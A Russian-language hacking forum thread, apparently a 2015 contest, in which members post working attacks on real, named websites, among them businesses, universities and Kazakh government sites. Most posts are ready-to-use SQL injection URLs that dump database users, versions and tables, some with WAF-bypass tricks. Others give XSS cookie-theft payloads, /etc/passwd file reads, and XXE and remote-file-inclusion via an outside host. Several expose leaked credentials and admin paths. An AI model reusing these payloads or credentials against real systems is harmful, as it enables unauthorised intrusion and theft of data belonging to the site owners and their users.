http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+

joelblack
26.07.2015, 01:34
target: http://www.romanianwriters.ro

type: SQL Injection

version: 5.1.61-0ubuntu0.10.10.1

user: romanian_rowri@localhost


http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1 +--+


target: http://www.bransonparksandrecreation.com

type: SQL Injection

version: 5.0.96-log1

user: bransonparks@173.201.216.51


http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+

target: http://www.microtekusa.com/

type: SQL Injection

version: 5.0.77

user: root@localhost


http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,table_name,57,5 8,59,60,61,62,63,64,65,66+from+information_schema. tables+--+

ocheretko
26.07.2015, 06:57
Нашел на Рамблере XSS:


http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert% 28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27 prompt%28111%29%27%3E

Нашел на ukr.net


https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0

А также, Чтение локальных файлов


http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd

А также буду первым запостившим XML eXternal Entity


http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml

Так как про этот тип уязвимости мало известно, немного комментариев:

Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл



]>

И потом выводим на экран &passwd;

P.S. Извините, проверил топ-таблицу, оказывается я не первый

faza02
31.07.2015, 15:01
таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.


↑ (https://antichat.live/posts/3872771/)
Нашел на Рамблере XSS:

http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert% 28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27 prompt%28111%29%27%3E

Нашел на ukr.net

https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0

А также, Чтение локальных файлов

http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd

А также буду первым запостившим XML eXternal Entity

http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml

Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл


]>

И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый


вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа

3nvY
04.08.2015, 02:16
Сайт: http://ww2.odu.edu

Уязвимость: LFR

Эксплоит:


http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php

В исходниках страницы видно PHP код. Только это мало что даёт, по крайней мере для меня.

joelblack
04.08.2015, 15:06
target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost


http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8, 9,10,11,12,13,14+from+information_schema.tables+li mit+3,1+--+

target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+3,1+--+

target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST


http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+info rmation_schema.tables+limit+3,1+--+&show=calc

target: http://www.qbele.com.br

type: SQL Injection

version: 5.1.73-rel14.11-log

user: site1371378569@186.202.153.159


http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user() ,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+ from+information_schema.tables+limit+3,1+--+&qCid=Todas

blud_niy
07.08.2015, 13:18
Site: http://www.gorodokboxing.com

Уязвимость: SQL Injection

Эксплоит:


http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+

Site: http://www.malnaditimudigere.com

Уязвимость: SQL Injection

Эксплоит:


http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+

Site: http://glamdring.baac.or.th

Уязвимость: SQL Injection

Эксплоит:


http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+

Site: http://web-sayansk.net

Уязвимость: SQL Injection

Эксплоит:


http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+

Site: http://www.replacement-windows.com

Уязвимость: SQL Injection

Эксплоит:


http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name, 8,9,10,user(),12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1+--+

Site: http://www.bellebuddy.com

Уязвимость: SQL Injection

Эксплоит:


http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22+--+

Site: http://www.babilon-nyelvstudio.hu

Уязвимость: SQL Injection

Эксплоит:


http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),tab le_name,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+3,1+--+

blud_niy
12.08.2015, 15:14
подскажите... а что, конкурс уже завершился?

faza02
12.08.2015, 15:33
↑ (https://antichat.live/posts/3879276/)
подскажите... а что, конкурс уже завершился?


нет, добавляю по возможности

comstream
13.08.2015, 16:19
Site: cc-comics.pl

Уязвимость: Local File Inclusion

Эксплоит:


http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

Site: www.ctpart.com (http://www.ctpart.com)

Уязвимость: Local File Inclusion


http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

comstream
20.08.2015, 19:15
Сайт : http://astana.gov.kz

Уязвимость: XSS

Эксплоит: http://astana.gov.kz/en/resetting/request

В поле

Username or email address:

Post запрос: alert(document.cookie);

faza02
07.09.2015, 23:45
↑ (https://antichat.live/posts/3876251/)
target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost


http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8, 9,10,11,12,13,14+from+information_schema.tables+li mit+3,1+--+

target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+3,1+--+

target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST


http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+info rmation_schema.tables+limit+3,1+--+&show=calc

target: http://www.qbele.com.br

type: SQL Injection

version: 5.1.73-rel14.11-log

user: site1371378569@186.202.153.159


http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user() ,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+ from+information_schema.tables+limit+3,1+--+&qCid=Todas





↑ (https://antichat.live/posts/3877429/)
Site:
http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:

http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+

Site:
http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:

http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+

Site:
http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:

http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+

Site:
http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:

http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+

Site:
http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:

http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name, 8,9,10,user(),12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1+--+

Site:
http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:

http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22+--+

Site:
http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:

http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),tab le_name,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+3,1+--+





↑ (https://antichat.live/posts/3879649/)
Site:
cc-comics.pl
Уязвимость:
Local File Inclusion
Эксплоит:

http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

Site:
www.ctpart.com (http://www.ctpart.com)

Уязвимость: Local File Inclusion

http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd





↑ (https://antichat.live/posts/3882516/)
Сайт :
http://astana.gov.kz
Уязвимость: XSS
Эксплоит:
http://astana.gov.kz/en/resetting/request
В поле
Username or email address:
Post запрос: alert(document.cookie);


добавил

comstream
10.09.2015, 12:11
Сайт : http://mod.gov.kz (http://astana.gov.kz/)

Уязвимость: XSS

Эксплоит:


mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25alert(document.cookie)/

Metal-Core
10.09.2015, 23:54
Сайт : http://4rpg.net/buy2.php?game=lineage2classic&server=Shillien

Уязвимость: XSS

Эксплоит: http://4rpg.net/buy3.php

Поля

"E-mail", "Ник в игре", "Комментарии" :

Post запрос: 'alert('satanic')

Strannik1236
11.09.2015, 13:41
Сколько уязвимостей надо найти и что получит победитель?

faza02
11.09.2015, 22:22
↑ (https://antichat.live/posts/3890102/)
Сколько уязвимостей надо найти и что получит победитель?


перечитайте первое сообщение

blud_niy
13.09.2015, 08:34
Site: thewhole9.com

Уязвимость: SQL Injection

Эксплоит:


http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user( ),table_name,12,13,14,15,16,17+from+information_sc hema.tables+limit+3,1+--+

Site: domainefoivos.com

Уязвимость: SQL Injection

Эксплоит:


http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8, 9,10+from+information_schema.tables+limit+3,1+--+

Site: zupa.pregrada.hr

Уязвимость: SQL Injection

Эксплоит:


http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+

Site: obfzgalanta.sk

Уязвимость: SQL Injection

Эксплоит:


http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user() +from+information_schema.tables+limit+3,1+--+

Site: obfztopolcany.sk

Уязвимость: SQL Injection

Эксплоит:


http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user() +from+information_schema.tables+limit+3,1+--+

Site: letzzep.com

Уязвимость: SQL Injection

Эксплоит:


http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version (),8+from+information_schema.tables+limit+3,1+--+

Site: agrovolyn.com

Уязвимость: SQL Injection

Эксплоит:


http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,use r()+from+information_schema.tables+limit+3,1+--+

Site: siempreenplay.com

Уязвимость: SQL Injection

Эксплоит:


http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+fro m+information_schema.tables+limit+3,1+--+

Site: kmbajwa.com

Уязвимость: SQL Injection

Эксплоит:


http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+inform ation_schema.tables+limit+4,1+--+

Site: bhajanawali.com

Уязвимость: SQL Injection

Эксплоит:


http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information _schema.tables+limit+4,1+--+

ubepkr
22.09.2015, 00:53
Всем привет!

В ручную пока не особо получается раскручивать, посему не вините))

http://www.24open-casino.com//index.php?act=games&hall=playtech&p= - интернет-казино, на сайте вообще куча косяков с SQLi и XSS, база элементарно вытаскивается, пароли в MD5, куча личной инфы по пользователям.

http://www.fortunataptr.pl/scripts/runner.php?GA= (http://www.fortunataptr.pl/scripts/runner.php?GA=%Inject_Here%btc) - мыла с акками, пароли в MD5 (SQLi);

http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= (http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid=%Inject_Here%7) - пароли без шифрования (SQLi);

http://www.yickyak.net/categories.php?catid= (http://www.yickyak.net/categories.php?catid=%Inject_Here%4) - пароли в MD5 (SQLi);

http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= (http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id=%Inject_Here %26) - пароли без шифрования (SQLi).

Diadlo
30.09.2015, 13:41
Сайт: www.metal-rules.com (http://www.metal-rules.com)

Уязвимость: SQL Injection

Эксплоит:


http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+

Заодно прошу подсказки. Это я упорот или там нет таблицы с пользователями?

AlexG
30.09.2015, 22:24
Ну-с попробуем хД

Сайт: przedszkolefelicjanek.pl

Уязвимость: SQLi

Эксплоит:


https://przedszkolefelicjanek.pl/index.php?action=2%20union%20select%20@@Version,2% 20--

Сайт: krapik.pl

Уязвимость: SQLi

Эксплоит:


http://www.krapik.pl/index.php?action=2&id=30%27%20union%20select%201,2,3,4,5,6,version%28 %29,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20% 20%20--%20%27and%201=1

Сайт: dobrawola.org.pl

Уязвимость: SQLi

Эксплоит:


http://www.dobrawola.org.pl/index.php?action=2%20union%20select%201,version%28 %29,3,user%28%29,5,6,7,8

Сайт: izba-lekarska.org.pl

Уязвимость: SQLi

Эксплоит:


http://www.izba-lekarska.org.pl/stara_strona/index.php?mid=1&sid=54;select+version%28%29::int--

Сайт: inter-system.com.pl

Уязвимость: SQLi

Эксплоит:


http://www.inter-system.com.pl/content.php?id=4;select+version%28%29::int--&ids=362

Сайт: przygodywoblokach.pl

Уязвимость: SQLi

Эксплоит:


http://www.przygodywoblokach.pl/content.php?id=23;select+version%28%29::int--&ids=362&ids=18

Сайт: fundacjafilmowa.pl

Уязвимость: SQLi

Эксплоит:


http://www.fundacjafilmowa.pl/print.php?id=142;select+version%28%29::int--

Сайт: wk-nieruchomosci.pl

Уязвимость: SQLi

Эксплоит:


http://wk-nieruchomosci.pl/print.php?id=6%20union%20select%201,2,3,version%28 %29,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18

Сайт: gamepat.de

Уязвимость: RFI

Эксплоит:


http://gamepat.de/portfolio/index.php?link=data%3A%2F%2Ftext%2Fplain%3Bbase64% 2CPD9waHAgcGhwaW5mbygpOyA%2FPg%20%20

Сайт: everybyte.nl

Уязвимость: IFRAME Injection

Эксплоит:


http://www.everybyte.nl/index.php?x=http://google.com

Сайт: dzienziemi.org.pl

Уязвимость: LFI

Эксплоит:


http://www.dzienziemi.org.pl/2015/index.php?m=hi&pm=../../../../../../etc/passwd

Сайт: festus.pl

Уязвимость: XSS (поганенькая, но в торе отработала)

Эксплоит:


http://www.festus.pl/search.htm?qt=%3Cscript%3Ealert%28%29;%3C/script%3E&szukaj.x=12&szukaj.y=10&lang=pl

AlexG
04.10.2015, 16:36
Сайт: endividado.com.br

Уязвимость: SQLi

Эксплоит (с обходом WAF):


http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+

UPD DIOS


http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x 696e666f726d6174696f6e5f736368656d61) and (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name, 0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8 ,9,10,11,12,13,14--+

AlexG
06.10.2015, 19:51
Сайт: www2.ufpel.edu.br

Уязвимость: AFR или LFI (как правильно, подскажите?)

Эксплоит:


http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index

ubepkr
07.10.2015, 08:05
Сайт: http://igrek.amzp.pl

Уязвимость: SQLi

Эксплоит:


http://igrek.amzp.pl/details.php?id=-11768531+UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER( ),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52--+


Сайт: humweb.ucsc.edu

Уязвимость: SQLi

Эксплоит:


http://humweb.ucsc.edu/mediterraneanseminar/news/index.php?id=-236'+UNION+ALL+SELECT+1,2,(Select+export_set(5,@:= 0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,@,table_name,0x3 c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6 --+


Сайт: http://nightgallery.ca

Уязвимость: SQLi

Эксплоит:


http://nightgallery.ca/event.php?id=-91+UNION+ALL+SELECT+1,export_set(5,@:=0,(select+co unt(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6 c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29 --+


Сайт: http://reviewedporn.com

Уязвимость: XSS (там их куча)

Эксплоит:


http://reviewedporn.com/cat/gangbang?orderby=toprated&page=2">prompt(909661)

Сайт: http://www.guessthespot.com

Уязвимость: SQLi

Эксплоит:


http://www.guessthespot.com/index.php?cat_id=-3%20+UNION+ALL+SELECT+1,2,3,export_set%285,@:=0,%2 8select+count%28*%29/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set%285,export_set%285,@,0 x3c6c693e,/*!50000column_name*/,2%29,0x3a3a,/*!50000table_name*/,2%29%29,@,2%29,5,6,7,8%20--


Сайт: http://www.rotawheels.com

Уязвимость: SQLi

Эксплоит:


http://www.rotawheels.com/news.php?id=5 +UNION+ALL+SELECT+1,2,(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736 368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@)),4,5--


Сайт: http://www.cese.utulsa.edu

Уязвимость: SQLi

Эксплоит:


http://www.cese.utulsa.edu/programdetail.php?ID=-127 +UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USE R(),DATABASE(),VERSION()),7,8,9 --

Сайт: http://www.freepoc.org

Уязвимость: SQLi

Эксплоит:


http://www.freepoc.org/viewapp.php?id=32 +UNION+ALL+SELECT+1,2,3,4,5,6,7,(Select+export_set (5,@:=0,(select+count(*)from(information_schema.co lumns)where@:=export_set(5,export_set(5,@,table_na me,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--


Сайт: http://www.clanwilliam.info

Уязвимость: SQLi

Эксплоит:


http://www.clanwilliam.info/index.php?id=-1 +UNION+ALL+SELECT+1,(select(select+concat(@:=0xa7, (select+count(*)from(information_schema.columns)wh ere(@:=concat(@,0x3c6c693e,table_name,0x3a,column_ name))),@))),3,4,5,6,7 --

antikonstantin
10.10.2015, 22:33
Сайт: http://www.sunmedi.co.kr/

Уязвимость: SQLi

Эксплоит:


http://www.sunmedi.co.kr/EOrder/index.asp?ShopID=nunbo0808' or 1=[t] and '1'='1

Сайт: http://www.wzxsc.net/

Уязвимость: SQLi

Эксплоит:


http://www.wzxsc.net/category.php?catid=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Сайт: http://skywatcher.com/

Уязвимость: SQLi

Эксплоит:


http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17

Сайт: http://www.terraforza.nl/

Уязвимость: SQLi

Эксплоит:


http://www.terraforza.nl/index.php?catid=79' and [t] and '1'='1

Сайт: http://www.dgn.co.th/

Уязвимость: SQLi

Эксплоит:


http://www.dgn.co.th/product-view.php?product_ID=999999.9' union all select 1,[t],3,4 and '0'='0

Сайт: http://www.ampak.com.tw/

Уязвимость: SQLi

Эксплоит:


http://www.ampak.com.tw/product_list.php?cid=[t]

faza02
12.10.2015, 02:27
↑ (https://antichat.live/posts/3899303/)
Сайт: www2.ufpel.edu.br
Уязвимость: LFR или AFR? (подскажите как правильно?)
Эксплоит:

http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index



все-таки тут AFR через RFI. всем, кто писал, добавил, если что-то в таблице не так, пишите в лс. AlexG проходит

ubepkr
12.10.2015, 10:23
↑ (https://antichat.live/posts/3900927/)
http://skywatcher.com/downloads.php?cat=999999.9
union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17


Привет!

Писал вчера ответ, но его кто-то съел))

Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123


http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --

Админку не нашел известными мне способами, но есть вот это:


http://skywatcher.com/_db_backups/.htaccess

где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"

в котором, соответственно, "skyw1042:RMyP86leOB18k".

Дальше вот затупил, что делать.

faza02
12.10.2015, 12:49
↑ (https://antichat.live/posts/3901475/)
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123

http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --

Админку не нашел известными мне способами, но есть вот это:

http://skywatcher.com/_db_backups/.htaccess

где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.


здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте

grimnir
12.10.2015, 17:03
↑ (https://antichat.live/posts/3901475/)
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123

http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:= CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c6 2723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --

Админку не нашел известными мне способами, но есть вот это:

http://skywatcher.com/_db_backups/.htaccess

где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.


http://skywatcher.com/sw_admin/login.php

ubepkr
12.10.2015, 19:46
↑ (https://antichat.live/posts/3901527/)
здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте


Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.

grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))

grimnir
12.10.2015, 21:13
↑ (https://antichat.live/posts/3901693/)
Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.
grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))


Не секрет, привычка проверять на индекс-файл гит http://skywatcher.com/.git/index тут вся структура сайта

antikonstantin
17.10.2015, 23:01
Сайт: http://www.calidus.ro/ (http://www.ampak.com.tw/)

Уязвимость: SQLi

Эксплоит:


http://www.calidus.ro/en/news.php?id=999999.9 union all select 1,[t],3,4

Сайт: http://www.protek.fr (http://www.ampak.com.tw/)

Уязвимость: SQLi

Эксплоит:


http://www.protek.fr/achat/index.php?catid=999999.9 union all select 1,[t]--

Сайт: http://www.parskado.com

Уязвимость: SQLi

Эксплоит:


http://www.parskado.com/category.php?CATID=999999.9 union all select [t],2

Сайт: http://www.worldofbirds.com/

Уязвимость: SQLi

Эксплоит:


http://www.worldofbirds.com/products.php?prodID=999999.9 union all select [t],2,3

Сайт: http://www.trinews.at/

Уязвимость: SQLi

Эксплоит:


http://www.trinews.at/index.asp?CID=[t]

Сайт: http://www.gotmachinery.com/

Уязвимость: SQLi

Эксплоит:


http://www.gotmachinery.com/gmbrowsetype.php?subcat_id=273' and [t] and '1'='1&lang_id=

Сайт: http://www.metalmate.in/

Уязвимость: SQLi

Эксплоит:


http://www.metalmate.in/product_detail.php?subcat_id=1' and [t] and '1'='1&cat_id=1&subsubcat_id=5

Сайт: http://bazarvidal.com.br/

Уязвимость: SQLi

Эксплоит:


http://bazarvidal.com.br/detcat.cfm?id=[t]

Сайт: http://www.fertilita.org/

Уязвимость: SQLi

Эксплоит:


http://www.fertilita.org/index.asp?CatID=999999.9 union all select 1,[t],3,4,5,6,7,8,9

Сайт: http://www.phcqa.org/

Уязвимость: SQLi

Эксплоит:


http://www.phcqa.org/measures/category.php?category_id=[t]

Сайт: http://www.jeannius.com/

Уязвимость: SQLi

Эксплоит:


http://www.jeannius.com/websys/store_mainpage.php?cat_id=999999.9 union all select 1,[t],3,4&subcat_id=46

Сайт: http://www.pad10.com/

Уязвимость: SQLi

Эксплоит:


http://www.pad10.com/pad10/project_listing_category.php?subcat_id=11' and [t] and '1'='1

Сайт: http://www.foldermate.com/

Уязвимость: SQLi

Эксплоит:


http://www.foldermate.com/product_list.php?lang=en&id=F4C2DE0E-8D10-421E-B4EF-A8D67B7836E9999999.9' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16 and '0'='0

Сайт: http://www.kingscommodities.com/

Уязвимость: SQLi

Эксплоит:


http://www.kingscommodities.com/products.php?prodid=999999.9 union all select 1,[t],3,4,5,6

Сайт: http://www.architrend.com.au/

Уязвимость: SQLi

Эксплоит:

http://www.architrend.com.au/product-details.php? (http://www.architrend.com.au/product-details.php?category_id=46&product_id=706)


category_id=46&product_id=706' and [t] and '1'='1

Сайт: http://www.bellmtcs.com/

Уязвимость: SQLi

Эксплоит:


http://www.bellmtcs.com/store/index.php?cid=121 or 1=[t] and 1=1

Сайт: http://office.altakadom.com/

Уязвимость: SQLi

Эксплоит:


http://office.altakadom.com/products.php?subcat_id=130' and [t] and '1'='1

admin indi@2011

Сайт: http://www.sb2online.com/

Уязвимость: SQLi

Эксплоит:


http://www.sb2online.com/view_item.php?prodid=999999.9 union all select 1,2,[t],4

Сайт: http://old.harbourfood.com/

Уязвимость: SQLi

Эксплоит:


http://old.harbourfood.com/products/default.php?cat=Equipment&cls=&subcls=&vendor=[t]

Сайт: http://www.ptsrentals.com/

Уязвимость: SQLi

Эксплоит:


http://www.ptsrentals.com/catalog.php?c=999999.9 union all select [t],2,3,4,5,6,7,8,9

Сайт: http://www.savillsguardian.com.hk/

Уязвимость: SQLi

Эксплоит:


http://www.savillsguardian.com.hk/html/customer/index.asp?id=1594' or 1=[t] and '1'='1

Сайт: http://www.arroxx.com/

Уязвимость: SQLi

Эксплоит:


http://www.arroxx.com/catalogue.php?pID=[t]

Сайт: http://michiganlakeproducts.com/

Уязвимость: SQLi

Эксплоит:


